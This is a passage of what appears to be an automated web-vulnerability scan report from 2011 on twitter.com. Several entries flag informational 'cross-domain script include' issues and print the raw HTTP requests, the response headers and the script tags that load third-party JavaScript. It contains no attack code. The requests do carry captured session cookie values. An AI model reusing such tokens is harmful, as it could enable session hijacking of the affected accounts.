Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:33:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225207-26457-5034
ETag: "698a31e98a86756a2e7c5d6c189279a5"
Last-Modified: Fri, 28 Jan 2011 14:33:27 GMT
X-Runtime: 0.04616
Content-Type: text/html; charset=utf-8
Content-Length: 18931
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2I4YmEyNmNmNGJiZWU4OTQwZjQzMmI3Yjc1ZWY1%250ANmE6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--6505c9c812096e5cf60081e8a28d63744411389b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.525. http://twitter.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /privacy

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:13:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234782-88353-14797
ETag: "a0df28720bf78ccb1c59725c49be6ba0"
Last-Modified: Fri, 28 Jan 2011 17:13:02 GMT
X-Runtime: 0.04175
Content-Type: text/html; charset=utf-8
Content-Length: 18801
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.526. http://twitter.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /privacy

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225080-72692-36002
ETag: "728deff396f751fb7d15a00d76938c97"
Last-Modified: Fri, 28 Jan 2011 14:31:20 GMT
X-Runtime: 0.03526
Content-Type: text/html; charset=utf-8
Content-Length: 18932
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNGY1MzgyYzMzYTg4Mzg2YTMzY2RlZDc2NjAwMDli%250AMzM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--0d04f4b19d1ef9fb4248b979f81a1df77a504fb3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.527. http://twitter.com/rachbarnhart

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rachbarnhart

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-44205-8520
ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01426
Content-Type: text/html; charset=utf-8
Content-Length: 52627
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.528. http://twitter.com/rachbarnhart

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rachbarnhart

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234661-73856-26288
ETag: "d7837c8cf77c291ae00db7181d2c78ea"
Last-Modified: Fri, 28 Jan 2011 17:11:01 GMT
X-Runtime: 0.05064
Content-Type: text/html; charset=utf-8
Content-Length: 52669
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.529. http://twitter.com/rem

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rem

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /rem HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-70162-12873
ETag: "f1048f44c2dbfae0ca279695ab2f56e2"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.00958
Content-Type: text/html; charset=utf-8
Content-Length: 54681
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.530. http://twitter.com/rickrussie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rickrussie

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234600-40167-24982
ETag: "7aa27a473c1875804f64ad53fb802d06"
Last-Modified: Fri, 28 Jan 2011 17:10:00 GMT
X-Runtime: 0.01367
Content-Type: text/html; charset=utf-8
Content-Length: 51512
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.531. http://twitter.com/rickrussie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rickrussie

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-95753-62367
ETag: "8ac086fffec8d5f0dbc55eb3e67e6a96"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.00915
Content-Type: text/html; charset=utf-8
Content-Length: 51643
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

